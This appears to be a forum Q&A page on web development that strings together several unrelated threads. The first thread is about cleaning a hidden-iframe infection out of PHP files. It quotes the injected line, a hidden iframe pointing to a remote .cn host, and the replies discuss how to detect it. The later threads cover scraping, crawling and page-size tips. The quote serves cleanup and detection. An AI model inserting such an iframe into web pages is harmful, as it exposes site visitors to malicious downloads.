Is there any legit use for hidden iframe? I've got viruses as per Can a file be read and written right back with small changes without knowing its encoding in C#? which are all over the php files (it seems one entry per file but can't be sure with 5000 files).
The ones I found have this but I can't be sure there are others with something a bit different inside. Could I assume all iframe where visibility is hidden are malicious?
<iframe src="http://hugetopdiet.cn:8080/ts/in.cgi?pepsi13" width=2 height=4 style="visibility: hidden"></iframe>
Or maybe there's other way I could tell my c# code to look at it? I don't want to break the files and websites but I can't just look for exact value as I may miss something.
A hidden IFRAME can certainly be useful for malicious purposes, but it can be used legitimately. For example, you could use a hidden IFRAME to emulate asynchronous calls to the server (ASP.Net did this at one point, if I recall).
I have also used IFRAMEs to get around file upload control limitations (both hidden and visible IFRAMEs can be useful for this).
Suspicious, but not malicious by default.
Some old traffic counters I've seen use hidden iFrames to count traffic, but that's about the only legitimate usage of a hidden iFrame; I certainly don't like it and if it were me, I would remove those as well.
Another thing you could check for is if the iFrame was hidden and the source is not from your domain.
Related
There several websites that use AJAX to update the contents periodically and I would like to monitor them. That's why it is necessary to keep multiple webpage windows always open and to grab page sources periodically.
I am searching for an approach for getting HTML sources from these webpages! Could you recommend something? I need it for statistical analysis.
Here are my thoughts so far:
approach. Opening separate Chrome windows manually. Using Handles to find the window. The problem is that it is nearly impossible to grab the HTML of the webpage.. (except the rich text)
Approach. writing an extension for Chrome/Firefox and a C# program. Program will send requests to extension and the extension will return HTML contents of the webpage. That's the theory. Google didn't put my hopes high so I am not sure if that is possible...
Approach. The most realistic one. Using the embed browser such as CefSharp, Awesomium, etc.. But as I mentioned - they have to support multiple opened windows! Any problems here?
So, these are my thought after hours of study..
Personally I would love to implement approach 2 because it is the most awesome.. but others will do too. What would be the easiest and most bulletproof?
Additionaly I would love a feature to do some input operations in these windows. ex: Login/navigate.
If IE browser is an option, look at implementing a managed add-on that will allow you to hook into notifications when document is loaded, access to live DOM of the document, possibly notifications when DOM changes, and so on. The same can be done in FF/Chrome. With IE, look into IObjectWithSite COM interface. This article seems to be a decent tutorial, though I'm not vouching for its accuracy.
I have a webpage which has a iframe, textbox and button but nothing else... user types a URL to the textbox then clicks on the button. after that, URL is assined as the source of the iframe.
what happenes after is a java applet takes the screenshot of the webpage etc. etc.
What I discovered today, in Google Chrome, there is this option in the right click menu named "inspect element". With the help of this feature, user are likely to change whats inside of an iframe and manipulates the original data. Does anyone know how can I encrypt the source of iframe.
P.S. source of iframe is authenticated data.
This is what it look like before manupilation
This is after manupilation
The short answer to your question is "no". Html is a client-side SCRIPT language; while you may find ways to make things increasingly difficult to "manipulate", you ultimately have no ability to entirely prevent a user from seeing every single detail of what you are trying to do with 1 significant exception and that is the use of an applet or plugin (ie: flash, java, activex).
To help with your problem, if you are already using an applet, why not leverage that over using an iframe? You could also consider using the applet to generate a jpeg for delivery rather than HTML.
I am developing a .net web application in c#/.net. For images on my site I am using relative paths. However to assist with performance of my site I am looking to introduce cookieless domains for images.
In most situations I can just add the domain to the images.
But in certain scenarios I cant and need to do it at run time. So I am looking at introducing some code to resolve the urls. I have a couple options of doing this.
Method in base page to loop through all the controls, add append the domain to all controls that inherit for System.Web.Ui.Image and append domain if not present.
Or do similar in a http module. (Is this possible)
Will doing the above slow down my site rendering? I dont want this to be counter productive!
Either of the above approaches should work ok for .net controls.
But any ideas how I might append the domain to html img tag and/or any images within my stylesheets? I probably can just set the domains of the img tag in code, but not sure of the stylesheets.
You can consider using Response.Filter too.
I have been given a task to crawl / parse and index available books on many library web page. I usually use HTML Agility Pack and C# to parse web site content. One of them is the following:
http://bibliotek.kristianstad.se/pls/bookit/pkg_www_misc.print_index?in_language_id=en_GB
If you search for a * (all books) it will return many lists of books, paginated by 10 books per page.
Typical web crawlers that I have found fail on this website. I have also tried to write my own crawler, which would go through all links on the page and generate post/get variables to dynamically generate results. I havent been able to do this as well, mostly due to some 404 errors that I get (although I am certain that the links generated are correct).
The site relies on javascript to generate content, and uses a mixed mode of GET and POST variable submission.
I'm going out on a limb, but try observing the JavaScript GETs and POSTs with Fiddler and then you can base your crawling off of those requests. Fiddler has FiddlerCore, which you can put in your own C# project. Using this, you could monitor requests made in the WebBrowser control and then save them for crawling or whatever, later.
Going down the C# JavaScript interpreter route sounds like the 'more correct' way of doing this, but I wager it will be much harder and frought with errors and bugs unless you have the simplest of cases.
Good luck.
FWIW, the C# WebBrowser control is very, very slow. It also doesn't support more than two simultaneous requests.
Using SHDocVw is faster, but is also semaphore limited.
Faster still is using MSHTML. Working code here: https://svn.arachnode.net/svn/arachnodenet/trunk/Renderer/HtmlRenderer.cs Username/Password: Public (doesn't have the request/rendering limitations that the other two have when run out of process...)
This is headless, so none of the controls are rendered. (Faster).
Thanks,
Mike
If you use the WebBrowser control in a Windows Forms application to open the page then you should be able to access the DOM through the HtmlDocument. That would work for the HTML links.
As for the links that are generated through Javascript, you might look at the ObjectForScripting property which should allow you to interface with the HTML page through Javascript. The rest then becomes a Javascript problem, but it should (in theory) be solvable. I haven't tried this so I can't say.
If the site generates content with JavaScript, then you are out of luck. You need a full JavaScript engine usable in C# so that you can actually execute the scripts and capture the output they generate.
Take a look at this question: Embedding JavaScript engine into .NET -- but know that it will take "serious" effort to do what you need.
AbotX does javascript rendering for you. Its not free though.
I'm developing a newsletter in asp.net that will be send to a large quantity of users, so each kilobyte that I can reduce will help a lot in the use of bandwidth consumption, what I do until know is write the aspx excluding some spaces between tags, and before render, i've renamed some controls ids to "-" to save more space.
So now, the file has 50kb. I need a file with 25 Kb.
Can anyone teach me any other way do save more space ?
ps.: I Use 3 divs with some data, and 2 repeaters, one inside other, to generate a table with some data for me.
EDIT: I've disabled viewstate, and remove unnecessary divs, I'll try to verify if gzip is enabled in IIS.
thanks in advance
Make sure HTTP compression is enabled. It will help to reduce the amount of HTML, but enabling HTTP compression will give more than the marginal improvements you're likely to see.
There are different ways to enable compression, depending on your version of IIS. For instance, in IIS 6.0, you can manually edit metabase.xml or run:
cscript adsutil.vbs set w3svc/filters/compression/parameters/HcDoDynamicCompression true
You can check HTTP headers to verify that compression is enabled using something like https://addons.mozilla.org/en-US/firefox/addon/3829/ Live HTTP Headers for Firefox. Check your headers for "Content-Encoding: gzip".
Don't use an aspx page if you want full control. Make a Generic Handler, and then you can have full control over every byte generated.
Instead of using Repeaters, just loop through a dataset and output tables or spans or something. Although, I have to say, repeaters are very easy to control the exact output of, too.
Look at your generated html and see if you can identify any obvious culprits.
You can disable the viewstate and optimize image files if you are using any.
I recommend going over this article if your using ASP.Net Web Forms - explains how to correctly utilize ViewState:
http://weblogs.asp.net/infinitiesloop/archive/2006/08/03/Truly-Understanding-Viewstate.aspx
You might want to look into IIS Compression(it uses gzip IIRC). That should knock the file size down.
Also minify the javascript/css(I've done that and seen up to 40% reduction on js/css file sizes), here's a link to a book/website that talks about other things you can do: http://developer.yahoo.com/performance/rules.html, the book's title is "High Performance Web Sites", the ISBN: 978-0-596-52930-7
It may not work out to much savings, but you can also reduce markup by seriously considering whether to use DIVs for styling purposes when styling the contents directly would achieve the same result.
For instance,
<div class="sidebar">
<ul>
<li>Lorem</li>
</ul>
</div>
In most cases you can get the same result from styling the UL directly:
<ul class="sidebar">
<li>Lorem</li>
</ul>
But in your case, the repeaters are probably the main source of the bloat. Make sure you're using a custom template for them with clean HTML, and not relying on the out of the box rendering, which can be quite messy.
Like someone else posted, turn off viewstate for any controls you don't need it on - that's a TON of junk alone.